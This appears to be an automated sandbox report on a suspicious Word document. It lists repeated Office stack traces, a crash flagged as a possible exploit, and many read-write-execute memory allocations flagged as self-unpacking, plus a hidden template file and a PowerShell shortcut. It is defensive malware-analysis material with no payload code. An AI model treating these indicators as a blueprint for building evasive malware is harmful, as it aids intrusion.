_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456
0x497b57
_MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b
DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca
DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c
DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117
DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2
DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5
wdCommandDispatch-0x370 winword+0x15c4 @ 0xdf15c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xdf1558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2936192
registers.edi: 2936356
registers.eax: 2936192
registers.ebp: 2936272
registers.edx: 0
registers.ebx: 2937408
registers.esi: 3221549073
registers.ecx: 2147483648

Allocates read-write-execute memory (usually to unpack itself) (50 out of 439 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a7ee000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04830000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04830000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04830000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04830000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04830000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04830000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a0a1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a0a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02412000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0244a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02423000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02424000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02457000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02442000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02455000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0244c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02426000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02443000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02444000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02445000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02448000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02449000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 804 crashed
__exception__ April 18, 2023, 6:58 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5 SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629 SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412 SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x663ea648 _MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94 _MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823 _MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3 _MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f _MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05 _MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456 0x497b57 _MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49 _MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc _MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61 _MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808 _MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8 _MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d _MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad _MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d _MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189 _MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b _MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9 _MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117 DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2 DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5 wdCommandDispatch-0x370 winword+0x15c4 @ 0xdf15c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0xdf1558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 2936192 registers.edi: 2936356 registers.eax: 2936192 registers.ebp: 2936272 registers.edx: 0 registers.ebx: 2937408 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Application Crash

Process WINWORD.EXE with pid 804 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

April 18, 2023, 6:58 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a
SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x663ea648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456
0x497b57
_MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b
DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca
DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c
DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117
DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2
DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5
wdCommandDispatch-0x370 winword+0x15c4 @ 0xdf15c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xdf1558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$newf.dotm

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 18, 2023, 6:58 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000490 filepath: C:\Users\test22\AppData\Local\Temp\~$newf.dotm desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$newf.dotm create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

